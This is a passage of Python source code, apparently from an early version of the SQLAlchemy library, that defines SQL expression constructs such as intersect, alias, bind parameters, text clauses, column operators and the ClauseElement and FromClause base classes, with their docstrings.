return _compound_select('EXCEPT ALL', *selects, **kwargs)
def intersect(*selects, **kwargs):
"""Return an ``INTERSECT`` of multiple selectables.
The returned object is an instance of
:class:`CompoundSelect`.
\*selects
a list of :class:`Select` instances.
\**kwargs
available keyword arguments are the same as those of
:func:`select`.
"""
return _compound_select('INTERSECT', *selects, **kwargs)
def intersect_all(*selects, **kwargs):
"""Return an ``INTERSECT ALL`` of multiple selectables.
The returned object is an instance of
:class:`CompoundSelect`.
\*selects
a list of :class:`Select` instances.
\**kwargs
available keyword arguments are the same as those of
:func:`select`.
"""
return _compound_select('INTERSECT ALL', *selects, **kwargs)
def alias(selectable, alias=None):
"""Return an :class:`Alias` object.
An :class:`Alias` represents any :class:`FromClause`
with an alternate name assigned within SQL, typically using the ``AS``
clause when generated, e.g. ``SELECT * FROM table AS aliasname``.
Similar functionality is available via the :func:`alias()` method
available on all :class:`FromClause` subclasses.
selectable
any :class:`FromClause` subclass, such as a table, select
statement, etc..
alias
string name to be assigned as the alias. If ``None``, a
random name will be generated.
"""
return Alias(selectable, alias=alias)
def literal(value, type_=None):
"""Return a literal clause, bound to a bind parameter.
Literal clauses are created automatically when non- :class:`ClauseElement`
objects (such as strings, ints, dates, etc.) are used in a comparison
operation with a :class:`_CompareMixin`
subclass, such as a :class:`~sqlalchemy.schema.Column` object. Use this function to force the
generation of a literal clause, which will be created as a
:class:`_BindParamClause` with a bound value.
:param value: the value to be bound. Can be any Python object supported by
the underlying DB-API, or is translatable via the given type argument.
:param type\_: an optional :class:`~sqlalchemy.types.TypeEngine` which
will provide bind-parameter translation for this literal.
"""
return _BindParamClause(None, value, type_=type_, unique=True)
def tuple_(*expr):
"""Return a SQL tuple.
Main usage is to produce a composite IN construct::
tuple_(table.c.col1, table.c.col2).in_(
[(1, 2), (5, 12), (10, 19)]
)
"""
return _Tuple(*expr)
def label(name, obj):
"""Return a :class:`_Label` object for the
given :class:`ColumnElement`.
A label changes the name of an element in the columns clause of a
``SELECT`` statement, typically via the ``AS`` SQL keyword.
This functionality is more conveniently available via the
:func:`label()` method on :class:`ColumnElement`.
name
label name
obj
a :class:`ColumnElement`.
"""
return _Label(name, obj)
def column(text, type_=None):
"""Return a textual column clause, as would be in the columns clause of a
``SELECT`` statement.
The object returned is an instance of
:class:`ColumnClause`, which represents the
"syntactical" portion of the schema-level
:class:`~sqlalchemy.schema.Column` object.
text
the name of the column. Quoting rules will be applied to the
clause like any other column name. For textual column
constructs that are not to be quoted, use the
:func:`literal_column` function.
type\_
an optional :class:`~sqlalchemy.types.TypeEngine` object which will
provide result-set translation for this column.
"""
return ColumnClause(text, type_=type_)
def literal_column(text, type_=None):
"""Return a textual column expression, as would be in the columns
clause of a ``SELECT`` statement.
The object returned supports further expressions in the same way as any
other column object, including comparison, math and string operations.
The type\_ parameter is important to determine proper expression behavior
(such as, '+' means string concatenation or numerical addition based on
the type).
text
the text of the expression; can be any SQL expression. Quoting rules
will not be applied. To specify a column-name expression which should
be subject to quoting rules, use the
:func:`column` function.
type\_
an optional :class:`~sqlalchemy.types.TypeEngine` object which will
provide result-set translation and additional expression semantics for
this column. If left as None the type will be NullType.
"""
return ColumnClause(text, type_=type_, is_literal=True)
def table(name, *columns):
"""Return a :class:`TableClause` object.
This is a primitive version of the :class:`~sqlalchemy.schema.Table` object,
which is a subclass of this object.
"""
return TableClause(name, *columns)
def bindparam(key, value=None, type_=None, unique=False, required=False):
"""Create a bind parameter clause with the given key.
value
a default value for this bind parameter. a bindparam with a
value is called a ``value-based bindparam``.
type\_
a sqlalchemy.types.TypeEngine object indicating the type of this
bind param, will invoke type-specific bind parameter processing
unique
if True, bind params sharing the same name will have their
underlying ``key`` modified to a uniquely generated name.
mostly useful with value-based bind params.
required
A value is required at execution time.
"""
if isinstance(key, ColumnClause):
return _BindParamClause(key.name, value, type_=key.type, unique=unique, required=required)
else:
return _BindParamClause(key, value, type_=type_, unique=unique, required=required)
def outparam(key, type_=None):
"""Create an 'OUT' parameter for usage in functions (stored procedures),
for databases which support them.
The ``outparam`` can be used like a regular function parameter.
The "output" value will be available from the
:class:`~sqlalchemy.engine.ResultProxy` object via its ``out_parameters``
attribute, which returns a dictionary containing the values.
"""
return _BindParamClause(
key, None, type_=type_, unique=False, isoutparam=True)
def text(text, bind=None, *args, **kwargs):
"""Create literal text to be inserted into a query.
When constructing a query from a :func:`select()`, :func:`update()`,
:func:`insert()` or :func:`delete()`, using plain strings for argument
values will usually result in text objects being created
automatically. Use this function when creating textual clauses
outside of other :class:`ClauseElement` objects, or optionally wherever
plain text is to be used.
text
the text of the SQL statement to be created. use ``:<param>``
to specify bind parameters; they will be compiled to their
engine-specific format.
bind
an optional connection or engine to be used for this text query.
autocommit=True
Deprecated. Use .execution_options(autocommit=<True|False>)
to set the autocommit option.
bindparams
a list of :func:`bindparam()` instances which can be used to define
the types and/or initial values for the bind parameters within
the textual statement; the keynames of the bindparams must match
those within the text of the statement. The types will be used
for pre-processing on bind values.
typemap
a dictionary mapping the names of columns represented in the
``SELECT`` clause of the textual statement to type objects,
which will be used to perform post-processing on columns within
the result set (for textual statements that produce result
sets).
"""
return _TextClause(text, bind=bind, *args, **kwargs)
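# A brief illustration (a sketch only; "engine" stands for a hypothetical
# Engine, and the table and column names are illustrative):
#
#     t = text("SELECT * FROM users WHERE users.id = :uid")
#     result = engine.execute(t, uid=7)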
def null():
"""Return a :class:`_Null` object, which compiles to ``NULL`` in a sql
statement.
"""
return _Null()
class _FunctionGenerator(object):
"""Generate :class:`Function` objects based on getattr calls."""
def __init__(self, **opts):
self.__names = []
self.opts = opts
def __getattr__(self, name):
# passthru __ attributes; fixes pydoc
if name.startswith('__'):
try:
return self.__dict__[name]
except KeyError:
raise AttributeError(name)
elif name.endswith('_'):
name = name[0:-1]
f = _FunctionGenerator(**self.opts)
f.__names = list(self.__names) + [name]
return f
def __call__(self, *c, **kwargs):
o = self.opts.copy()
o.update(kwargs)
if len(self.__names) == 1:
global functions
if functions is None:
from sqlalchemy.sql import functions
func = getattr(functions, self.__names[-1].lower(), None)
if func is not None:
return func(*c, **o)
return Function(
self.__names[-1], packagenames=self.__names[0:-1], *c, **o)
# "func" global - i.e. func.count()
func = _FunctionGenerator()
# "modifier" global - i.e. modifier.distinct
# TODO: use UnaryExpression for this instead ?
modifier = _FunctionGenerator(group=False)
class _generated_label(unicode):
"""A unicode subclass used to identify dynamically generated names."""
def _escape_for_generated(x):
if isinstance(x, _generated_label):
return x
else:
return x.replace('%', '%%')
def _clone(element):
return element._clone()
def _expand_cloned(elements):
"""expand the given set of ClauseElements to be the set of all 'cloned'
predecessors.
"""
return itertools.chain(*[x._cloned_set for x in elements])
def _select_iterables(elements):
"""expand tables into individual columns in the
given list of column expressions.
"""
return itertools.chain(*[c._select_iterable for c in elements])
def _cloned_intersection(a, b):
"""return the intersection of sets a and b, counting
any overlap between 'cloned' predecessors.
    The returned set is in terms of the entities present within 'a'.
"""
all_overlap = set(_expand_cloned(a)).intersection(_expand_cloned(b))
return set(elem for elem in a if all_overlap.intersection(elem._cloned_set))
def _compound_select(keyword, *selects, **kwargs):
return CompoundSelect(keyword, *selects, **kwargs)
def _is_literal(element):
return not isinstance(element, Visitable) and \
not hasattr(element, '__clause_element__')
def _from_objects(*elements):
return itertools.chain(*[element._from_objects for element in elements])
def _labeled(element):
if not hasattr(element, 'name'):
return element.label(None)
else:
return element
def _column_as_key(element):
if isinstance(element, basestring):
return element
if hasattr(element, '__clause_element__'):
element = element.__clause_element__()
return element.key
def _literal_as_text(element):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
elif not isinstance(element, Visitable):
return _TextClause(unicode(element))
else:
return element
def _clause_element_as_expr(element):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
else:
return element
def _literal_as_column(element):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
elif not isinstance(element, Visitable):
return literal_column(str(element))
else:
return element
def _literal_as_binds(element, name=None, type_=None):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
elif not isinstance(element, Visitable):
if element is None:
return null()
else:
return _BindParamClause(name, element, type_=type_, unique=True)
else:
return element
def _type_from_args(args):
for a in args:
if not isinstance(a.type, sqltypes.NullType):
return a.type
else:
return sqltypes.NullType
def _no_literals(element):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
elif not isinstance(element, Visitable):
raise exc.ArgumentError("Ambiguous literal: %r. Use the 'text()' function "
"to indicate a SQL expression literal, or 'literal()' to indicate a bound value." % element)
else:
return element
def _corresponding_column_or_error(fromclause, column, require_embedded=False):
c = fromclause.corresponding_column(column,
require_embedded=require_embedded)
if c is None:
raise exc.InvalidRequestError(
"Given column '%s', attached to table '%s', "
"failed to locate a corresponding column from table '%s'"
%
(column,
getattr(column, 'table', None),fromclause.description)
)
return c
@util.decorator
def _generative(fn, *args, **kw):
"""Mark a method as generative."""
self = args[0]._generate()
fn(self, *args[1:], **kw)
return self
def is_column(col):
"""True if ``col`` is an instance of :class:`ColumnElement`."""
return isinstance(col, ColumnElement)
class ClauseElement(Visitable):
"""Base class for elements of a programmatically constructed SQL
expression.
"""
__visit_name__ = 'clause'
_annotations = {}
supports_execution = False
_from_objects = []
_bind = None
def _clone(self):
"""Create a shallow copy of this ClauseElement.
        This method may be used by a generative API. It's also used as
        part of the "deep" copy afforded by a traversal that combines it
        with the _copy_internals() method.
"""
c = self.__class__.__new__(self.__class__)
c.__dict__ = self.__dict__.copy()
c.__dict__.pop('_cloned_set', None)
# this is a marker that helps to "equate" clauses to each other
# when a Select returns its list of FROM clauses. the cloning
# process leaves around a lot of remnants of the previous clause
# typically in the form of column expressions still attached to the
# old table.
c._is_clone_of = self
return c
@util.memoized_property
def _cloned_set(self):
"""Return the set consisting all cloned anscestors of this
ClauseElement.
Includes this ClauseElement. This accessor tends to be used for
FromClause objects to identify 'equivalent' FROM clauses, regardless
of transformative operations.
"""
s = util.column_set()
f = self
while f is not None:
s.add(f)
f = getattr(f, '_is_clone_of', None)
return s
def __getstate__(self):
d = self.__dict__.copy()
d.pop('_is_clone_of', None)
return d
if util.jython:
def __hash__(self):
"""Return a distinct hash code.
ClauseElements may have special equality comparisons which
            make us rely on them having unique hash codes for use in
hash-based collections. Stock __hash__ doesn't guarantee
unique values on platforms with moving GCs.
"""
return id(self)
def _annotate(self, values):
"""return a copy of this ClauseElement with the given annotations
dictionary.
"""
global Annotated
if Annotated is None:
from sqlalchemy.sql.util import Annotated
return Annotated(self, values)
def _deannotate(self):
"""return a copy of this ClauseElement with an empty annotations
dictionary.
"""
return self._clone()
def unique_params(self, *optionaldict, **kwargs):
"""Return a copy with :func:`bindparam()` elments replaced.
Same functionality as ``params()``, except adds `unique=True`
to affected bind parameters so that multiple statements can be
used.
"""
return self._params(True, optionaldict, kwargs)
def params(self, *optionaldict, **kwargs):
"""Return a copy with :func:`bindparam()` elments replaced.
Returns a copy of this ClauseElement with :func:`bindparam()`
elements replaced with values taken from the given dictionary::
>>> clause = column('x') + bindparam('foo')
>>> print clause.compile().params
{'foo':None}
>>> print clause.params({'foo':7}).compile().params
{'foo':7}
"""
return self._params(False, optionaldict, kwargs)
def _params(self, unique, optionaldict, kwargs):
if len(optionaldict) == 1:
kwargs.update(optionaldict[0])
elif len(optionaldict) > 1:
raise exc.ArgumentError(
"params() takes zero or one positional dictionary argument")
def visit_bindparam(bind):
if bind.key in kwargs:
bind.value = kwargs[bind.key]
if unique:
bind._convert_to_unique()
return cloned_traverse(self, {}, {'bindparam':visit_bindparam})
def compare(self, other, **kw):
"""Compare this ClauseElement to the given ClauseElement.
Subclasses should override the default behavior, which is a
straight identity comparison.
\**kw are arguments consumed by subclass compare() methods and
may be used to modify the criteria for comparison.
(see :class:`ColumnElement`)
"""
return self is other
def _copy_internals(self, clone=_clone):
"""Reassign internal elements to be clones of themselves.
Called during a copy-and-traverse operation on newly
shallow-copied elements to create a deep copy.
"""
pass
def get_children(self, **kwargs):
"""Return immediate child elements of this :class:`ClauseElement`.
This is used for visit traversal.
\**kwargs may contain flags that change the collection that is
returned, for example to return a subset of items in order to
cut down on larger traversals, or to return child items from a
different context (such as schema-level collections instead of
clause-level).
"""
return []
def self_group(self, against=None):
return self
# TODO: remove .bind as a method from the root ClauseElement.
# we should only be deriving binds from FromClause elements
# and certain SchemaItem subclasses.
# the "search_for_bind" functionality can still be used by
# execute(), however.
@property
def bind(self):
"""Returns the Engine or Connection to which this ClauseElement is
bound, or None if none found.
"""
if self._bind is not None:
return self._bind
for f in _from_objects(self):
if f is self:
continue
engine = f.bind
if engine is not None:
return engine
else:
return None
def execute(self, *multiparams, **params):
"""Compile and execute this :class:`ClauseElement`."""
e = self.bind
if e is None:
label = getattr(self, 'description', self.__class__.__name__)
msg = ('This %s is not bound and does not support direct '
'execution. Supply this statement to a Connection or '
'Engine for execution. Or, assign a bind to the statement '
'or the Metadata of its underlying tables to enable '
'implicit execution via this method.' % label)
raise exc.UnboundExecutionError(msg)
return e._execute_clauseelement(self, multiparams, params)
def scalar(self, *multiparams, **params):
"""Compile and execute this :class:`ClauseElement`, returning the result's
scalar representation.
"""
return self.execute(*multiparams, **params).scalar()
def compile(self, bind=None, dialect=None, **kw):
"""Compile this SQL expression.
The return value is a :class:`~sqlalchemy.engine.Compiled` object.
Calling ``str()`` or ``unicode()`` on the returned value will yield a
string representation of the result. The
:class:`~sqlalchemy.engine.Compiled` object also can return a
dictionary of bind parameter names and values
using the ``params`` accessor.
:param bind: An ``Engine`` or ``Connection`` from which a
``Compiled`` will be acquired. This argument takes precedence over
this :class:`ClauseElement`'s bound engine, if any.
:param column_keys: Used for INSERT and UPDATE statements, a list of
column names which should be present in the VALUES clause of the
compiled statement. If ``None``, all columns from the target table
object are rendered.
        :param dialect: A ``Dialect`` instance from which a ``Compiled``
will be acquired. This argument takes precedence over the `bind`
argument as well as this :class:`ClauseElement`'s bound engine, if any.
:param inline: Used for INSERT statements, for a dialect which does
not support inline retrieval of newly generated primary key
columns, will force the expression used to create the new primary
key value to be rendered inline within the INSERT statement's
VALUES clause. This typically refers to Sequence execution but may
also refer to any server-side default generation function
associated with a primary key `Column`.
"""
if not dialect:
if bind:
dialect = bind.dialect
elif self.bind:
dialect = self.bind.dialect
bind = self.bind
else:
global DefaultDialect
if DefaultDialect is None:
from sqlalchemy.engine.default import DefaultDialect
dialect = DefaultDialect()
compiler = self._compiler(dialect, bind=bind, **kw)
compiler.compile()
return compiler
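    # Sketch of typical compile() usage (comment-only; 'users' and
    # 'some_engine' are hypothetical):
    #
    #     stmt = users.select(users.c.name == bindparam('name'))
    #     compiled = stmt.compile(dialect=some_engine.dialect)
    #     print str(compiled)     # the rendered SQL string
    #     print compiled.params   # {'name': None}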
def _compiler(self, dialect, **kw):
"""Return a compiler appropriate for this ClauseElement, given a Dialect."""
return dialect.statement_compiler(dialect, self, **kw)
def __str__(self):
# Py3K
#return unicode(self.compile())
# Py2K
return unicode(self.compile()).encode('ascii', 'backslashreplace')
# end Py2K
def __and__(self, other):
return and_(self, other)
def __or__(self, other):
return or_(self, other)
def __invert__(self):
return self._negate()
def __nonzero__(self):
raise TypeError("Boolean value of this clause is not defined")
def _negate(self):
if hasattr(self, 'negation_clause'):
return self.negation_clause
else:
return _UnaryExpression(
self.self_group(against=operators.inv),
operator=operators.inv,
negate=None)
def __repr__(self):
friendly = getattr(self, 'description', None)
if friendly is None:
return object.__repr__(self)
else:
return '<%s.%s at 0x%x; %s>' % (
self.__module__, self.__class__.__name__, id(self), friendly)
class _Immutable(object):
"""mark a ClauseElement as 'immutable' when expressions are cloned."""
def unique_params(self, *optionaldict, **kwargs):
raise NotImplementedError("Immutable objects do not support copying")
def params(self, *optionaldict, **kwargs):
raise NotImplementedError("Immutable objects do not support copying")
def _clone(self):
return self
class Operators(object):
def __and__(self, other):
return self.operate(operators.and_, other)
def __or__(self, other):
return self.operate(operators.or_, other)
def __invert__(self):
return self.operate(operators.inv)
def op(self, opstring):
def op(b):
return self.operate(operators.op, opstring, b)
return op
def operate(self, op, *other, **kwargs):
raise NotImplementedError(str(op))
def reverse_operate(self, op, other, **kwargs):
raise NotImplementedError(str(op))
class ColumnOperators(Operators):
"""Defines comparison and math operations."""
timetuple = None
"""Hack, allows datetime objects to be compared on the LHS."""
def __lt__(self, other):
return self.operate(operators.lt, other)
def __le__(self, other):
return self.operate(operators.le, other)
__hash__ = Operators.__hash__
def __eq__(self, other):
return self.operate(operators.eq, other)
def __ne__(self, other):
return self.operate(operators.ne, other)
def __gt__(self, other):
return self.operate(operators.gt, other)
def __ge__(self, other):
return self.operate(operators.ge, other)
def __neg__(self):
return self.operate(operators.neg)
def concat(self, other):
return self.operate(operators.concat_op, other)
def like(self, other, escape=None):
return self.operate(operators.like_op, other, escape=escape)
def ilike(self, other, escape=None):
return self.operate(operators.ilike_op, other, escape=escape)
def in_(self, other):
return self.operate(operators.in_op, other)
def startswith(self, other, **kwargs):
return self.operate(operators.startswith_op, other, **kwargs)
def endswith(self, other, **kwargs):
return self.operate(operators.endswith_op, other, **kwargs)
def contains(self, other, **kwargs):
return self.operate(operators.contains_op, other, **kwargs)
def match(self, other, **kwargs):
return self.operate(operators.match_op, other, **kwargs)
def desc(self):
return self.operate(operators.desc_op)
def asc(self):
return self.operate(operators.asc_op)
def collate(self, collation):
return self.operate(operators.collate, collation)
def __radd__(self, other):
return self.reverse_operate(operators.add, other)
def __rsub__(self, other):
return self.reverse_operate(operators.sub, other)
def __rmul__(self, other):
return self.reverse_operate(operators.mul, other)
def __rdiv__(self, other):
return self.reverse_operate(operators.div, other)
def between(self, cleft, cright):
return self.operate(operators.between_op, cleft, cright)
def distinct(self):
return self.operate(operators.distinct_op)
def __add__(self, other):
return self.operate(operators.add, other)
def __sub__(self, other):
return self.operate(operators.sub, other)
def __mul__(self, other):
return self.operate(operators.mul, other)
def __div__(self, other):
return self.operate(operators.div, other)
def __mod__(self, other):
return self.operate(operators.mod, other)
def __truediv__(self, other):
return self.operate(operators.truediv, other)
def __rtruediv__(self, other):
return self.reverse_operate(operators.truediv, other)
class _CompareMixin(ColumnOperators):
"""Defines comparison and math operations for :class:`ClauseElement` instances."""
def __compare(self, op, obj, negate=None, reverse=False, **kwargs):
if obj is None or isinstance(obj, _Null):
if op == operators.eq:
return _BinaryExpression(self, null(), operators.is_, negate=operators.isnot)
elif op == operators.ne:
return _BinaryExpression(self, null(), operators.isnot, negate=operators.is_)
else:
raise exc.ArgumentError("Only '='/'!=' operators can be used with NULL")
else:
obj = self._check_literal(obj)
if reverse:
return _BinaryExpression(obj,
self,
op,
type_=sqltypes.BOOLEANTYPE,
negate=negate, modifiers=kwargs)
else:
return _BinaryExpression(self,
obj,
op,
type_=sqltypes.BOOLEANTYPE,
negate=negate, modifiers=kwargs)
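    # Note on the NULL handling above (illustrative):
    #
    #     column('x') == None     # renders "x IS NULL"
    #     column('x') != None     # renders "x IS NOT NULL"
    #
    # Any other operator against None raises ArgumentError.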
def __operate(self, op, obj, reverse=False):
obj = self._check_literal(obj)
if reverse:
left, right = obj, self
else:
left, right = self, obj
if left.type is None:
op, result_type = sqltypes.NULLTYPE._adapt_expression(op, right.type)
elif right.type is None:
op, result_type = left.type._adapt_expression(op, sqltypes.NULLTYPE)
else:
op, result_type = left.type._adapt_expression(op, right.type)
return _BinaryExpression(left, right, op, type_=result_type)
# a mapping of operators with the method they use, along with their negated
# operator for comparison operators
operators = {
operators.add : (__operate,),
operators.mul : (__operate,),
operators.sub : (__operate,),
# Py2K
operators.div : (__operate,),
# end Py2K
operators.mod : (__operate,),
operators.truediv : (__operate,),
operators.lt : (__compare, operators.ge),
operators.le : (__compare, operators.gt),
operators.ne : (__compare, operators.eq),
operators.gt : (__compare, operators.le),
operators.ge : (__compare, operators.lt),
operators.eq : (__compare, operators.ne),
operators.like_op : (__compare, operators.notlike_op),
operators.ilike_op : (__compare, operators.notilike_op),
}
def operate(self, op, *other, **kwargs):
o = _CompareMixin.operators[op]
return o[0](self, op, other[0], *o[1:], **kwargs)
def reverse_operate(self, op, other, **kwargs):
o = _CompareMixin.operators[op]
return o[0](self, op, other, reverse=True, *o[1:], **kwargs)
def in_(self, other):
return self._in_impl(operators.in_op, operators.notin_op, other)
def _in_impl(self, op, negate_op, seq_or_selectable):
seq_or_selectable = _clause_element_as_expr(seq_or_selectable)
if isinstance(seq_or_selectable, _ScalarSelect):
return self.__compare( op, seq_or_selectable, negate=negate_op)
elif isinstance(seq_or_selectable, _SelectBaseMixin):
# TODO: if we ever want to support (x, y, z) IN (select x, y, z from table),
# we would need a multi-column version of as_scalar() to produce a multi-
# column selectable that does not export itself as a FROM clause
return self.__compare( op, seq_or_selectable.as_scalar(), negate=negate_op)
elif isinstance(seq_or_selectable, Selectable):
return self.__compare( op, seq_or_selectable, negate=negate_op)
# Handle non selectable arguments as sequences
args = []
for o in seq_or_selectable:
if not _is_literal(o):
if not isinstance( o, _CompareMixin):
raise exc.InvalidRequestError(
"in() function accepts either a list of non-selectable values, "
"or a selectable: %r" % o)
else:
o = self._bind_param(o)
args.append(o)
if len(args) == 0:
# Special case handling for empty IN's, behave like comparison
# against zero row selectable. We use != to build the
# contradiction as it handles NULL values appropriately, i.e.
# "not (x IN ())" should not return NULL values for x.
util.warn("The IN-predicate on \"%s\" was invoked with an empty sequence. "
"This results in a contradiction, which nonetheless can be "
"expensive to evaluate. Consider alternative strategies for "
"improved performance." % self)
return self != self
return self.__compare(op, ClauseList(*args).self_group(against=op), negate=negate_op)
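    # Illustrative result of the empty-sequence special case above:
    #
    #     column('x').in_([])     # warns, then renders "x != x" -- a
    #                             # contradiction that also excludes NULLs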
def __neg__(self):
return _UnaryExpression(self, operator=operators.neg)
def startswith(self, other, escape=None):
"""Produce the clause ``LIKE '<other>%'``"""
# use __radd__ to force string concat behavior
return self.__compare(
operators.like_op,
literal_column("'%'", type_=sqltypes.String).__radd__(self._check_literal(other)),
escape=escape)
def endswith(self, other, escape=None):
"""Produce the clause ``LIKE '%<other>'``"""
return self.__compare(
operators.like_op,
literal_column("'%'", type_=sqltypes.String) + self._check_literal(other),
escape=escape)
def contains(self, other, escape=None):
"""Produce the clause ``LIKE '%<other>%'``"""
return self.__compare(
operators.like_op,
literal_column("'%'", type_=sqltypes.String) +
self._check_literal(other) +
literal_column("'%'", type_=sqltypes.String),
escape=escape)
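    # The three LIKE helpers above concatenate '%' literals around the
    # operand, e.g. (rendering is dialect-dependent):
    #
    #     column('x').startswith('ab')   # x LIKE 'ab' || '%'
    #     column('x').endswith('ab')     # x LIKE '%' || 'ab'
    #     column('x').contains('ab')     # x LIKE '%' || 'ab' || '%'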
def match(self, other):
"""Produce a MATCH clause, i.e. ``MATCH '<other>'``
The allowed contents of ``other`` are database backend specific.
"""
return self.__compare(operators.match_op, self._check_literal(other))
def label(self, name):
"""Produce a column label, i.e. ``<columnname> AS <name>``.
        If 'name' is None, an anonymous label name will be generated.
"""
return _Label(name, self, self.type)
def desc(self):
"""Produce a DESC clause, i.e. ``<columnname> DESC``"""
return desc(self)
def asc(self):
"""Produce a ASC clause, i.e. ``<columnname> ASC``"""
return asc(self)
def distinct(self):
"""Produce a DISTINCT clause, i.e. ``DISTINCT <columnname>``"""
return _UnaryExpression(self, operator=operators.distinct_op, type_=self.type)
def between(self, cleft, cright):
"""Produce a BETWEEN clause, i.e. ``<column> BETWEEN <cleft> AND <cright>``"""
return _BinaryExpression(
self,
ClauseList(
self._check_literal(cleft),
self._check_literal(cright),
operator=operators.and_,
group=False),
operators.between_op)
def collate(self, collation):
"""Produce a COLLATE clause, i.e. ``<column> COLLATE utf8_bin``"""
return collate(self, collation)
def op(self, operator):
"""produce a generic operator function.
e.g.::
somecolumn.op("*")(5)
produces::
somecolumn * 5
:param operator: a string which will be output as the infix operator between
this :class:`ClauseElement` and the expression passed to the
generated function.
This function can also be used to make bitwise operators explicit. For example::
somecolumn.op('&')(0xff)
is a bitwise AND of the value in somecolumn.
"""
return lambda other: self.__operate(operator, other)
def _bind_param(self, obj):
return _BindParamClause(None, obj, _fallback_type=self.type, unique=True)
def _check_literal(self, other):
if isinstance(other, _BindParamClause) and isinstance(other.type, sqltypes.NullType):
other.type = self.type
return other
elif hasattr(other, '__clause_element__'):
return other.__clause_element__()
elif not isinstance(other, ClauseElement):
return self._bind_param(other)
elif isinstance(other, (_SelectBaseMixin, Alias)):
return other.as_scalar()
else:
return other
class ColumnElement(ClauseElement, _CompareMixin):
"""Represent an element that is usable within the "column clause" portion of a ``SELECT`` statement.
This includes columns associated with tables, aliases, and
subqueries, expressions, function calls, SQL keywords such as
``NULL``, literals, etc. :class:`ColumnElement` is the ultimate base
class for all such elements.
:class:`ColumnElement` supports the ability to be a *proxy* element,
which indicates that the :class:`ColumnElement` may be associated with
a :class:`Selectable` which was derived from another :class:`Selectable`.
An example of a "derived" :class:`Selectable` is an :class:`Alias` of a
:class:`~sqlalchemy.schema.Table`.
A :class:`ColumnElement`, by subclassing the :class:`_CompareMixin` mixin
class, provides the ability to generate new :class:`ClauseElement`
objects using Python expressions. See the :class:`_CompareMixin`
docstring for more details.
"""
__visit_name__ = 'column'
primary_key = False
foreign_keys = []
quote = None
_label = None
@property
def _select_iterable(self):
return (self, )
@util.memoized_property
def base_columns(self):
return util.column_set(c for c in self.proxy_set
if not hasattr(c, 'proxies'))
@util.memoized_property
def proxy_set(self):
s = util.column_set([self])
if hasattr(self, 'proxies'):
for c in self.proxies:
s.update(c.proxy_set)
return s
def shares_lineage(self, othercolumn):
"""Return True if the given :class:`ColumnElement` has a common ancestor to this :class:`ColumnElement`."""
return bool(self.proxy_set.intersection(othercolumn.proxy_set))
def _make_proxy(self, selectable, name=None):
"""Create a new :class:`ColumnElement` representing this
:class:`ColumnElement` as it appears in the select list of a
descending selectable.
"""
if name:
co = ColumnClause(name, selectable, type_=getattr(self, 'type', None))
else:
name = str(self)
co = ColumnClause(self.anon_label, selectable, type_=getattr(self, 'type', None))
co.proxies = [self]
selectable.columns[name] = co
return co
def compare(self, other, use_proxies=False, equivalents=None, **kw):
"""Compare this ColumnElement to another.
Special arguments understood:
:param use_proxies: when True, consider two columns that
share a common base column as equivalent (i.e. shares_lineage())
:param equivalents: a dictionary of columns as keys mapped to sets
of columns. If the given "other" column is present in this dictionary,
        if any of the columns in the corresponding set() pass the comparison
test, the result is True. This is used to expand the comparison to
other columns that may be known to be equivalent to this one via
foreign key or other criterion.
"""
to_compare = (other, )
if equivalents and other in equivalents:
to_compare = equivalents[other].union(to_compare)
for oth in to_compare:
if use_proxies and self.shares_lineage(oth):
return True
elif oth is self:
return True
else:
return False
@util.memoized_property
def anon_label(self):
"""provides a constant 'anonymous label' for this ColumnElement.
This is a label() expression which will be named at compile time.
The same label() is returned each time anon_label is called so
that expressions can reference anon_label multiple times, producing
the same label name at compile time.
the compiler uses this function automatically at compile time
for expressions that are known to be 'unnamed' like binary
expressions and function calls.
"""
return _generated_label("%%(%d %s)s" % (id(self), getattr(self, 'name', 'anon')))
class ColumnCollection(util.OrderedProperties):
"""An ordered dictionary that stores a list of ColumnElement
instances.
Overrides the ``__eq__()`` method to produce SQL clauses between
sets of correlated columns.
"""
def __init__(self, *cols):
super(ColumnCollection, self).__init__()
self.update((c.key, c) for c in cols)
def __str__(self):
return repr([str(c) for c in self])
def replace(self, column):
"""add the given column to this collection, removing unaliased versions of this column
as well as existing columns with the same key.
e.g.::
t = Table('sometable', metadata, Column('col1', Integer))
t.columns.replace(Column('col1', Integer, key='columnone'))
will remove the original 'col1' from the collection, and add
        the new column under the name 'columnone'.
Used by schema.Column to override columns during table reflection.
"""
if column.name in self and column.key != column.name:
other = self[column.name]
if other.name == other.key:
del self[other.name]
util.OrderedProperties.__setitem__(self, column.key, column)
def add(self, column):
"""Add a column to this collection.
The key attribute of the column will be used as the hash key
for this dictionary.
"""
self[column.key] = column
def __setitem__(self, key, value):
if key in self:
# this warning is primarily to catch select() statements which have conflicting
# column names in their exported columns collection
existing = self[key]
if not existing.shares_lineage(value):
util.warn(("Column %r on table %r being replaced by another "
"column with the same key. Consider use_labels "
"for select() statements.") % (key, getattr(existing, 'table', None)))
util.OrderedProperties.__setitem__(self, key, value)
def remove(self, column):
del self[column.key]
def extend(self, iter):
for c in iter:
self.add(c)
__hash__ = None
def __eq__(self, other):
l = []
for c in other:
for local in self:
if c.shares_lineage(local):
l.append(c==local)
return and_(*l)
def __contains__(self, other):
if not isinstance(other, basestring):
raise exc.ArgumentError("__contains__ requires a string argument")
return util.OrderedProperties.__contains__(self, other)
def contains_column(self, col):
        # have to use a set here, because it compares column identity;
        # a plain "==" comparison would always return a truthy value
        # (i.e. a _BinaryExpression...)
return col in util.column_set(self)
class ColumnSet(util.ordered_column_set):
def contains_column(self, col):
return col in self
def extend(self, cols):
for col in cols:
self.add(col)
def __add__(self, other):
return list(self) + list(other)
def __eq__(self, other):
l = []
for c in other:
for local in self:
if c.shares_lineage(local):
l.append(c==local)
return and_(*l)
def __hash__(self):
return hash(tuple(x for x in self))
class Selectable(ClauseElement):
"""mark a class as being selectable"""
__visit_name__ = 'selectable'
class FromClause(Selectable):
"""Represent an element that can be used within the ``FROM``
clause of a ``SELECT`` statement.
"""
__visit_name__ = 'fromclause'
named_with_column = False
_hide_froms = []
quote = None
schema = None
def count(self, whereclause=None, **params):
"""return a SELECT COUNT generated against this :class:`FromClause`."""
if self.primary_key:
col = list(self.primary_key)[0]
else:
col = list(self.columns)[0]
return select(
[func.count(col).label('tbl_row_count')],
whereclause,
from_obj=[self],
**params)
def select(self, whereclause=None, **params):
"""return a SELECT of this :class:`FromClause`."""
return select([self], whereclause, **params)
def join(self, right, onclause=None, isouter=False):
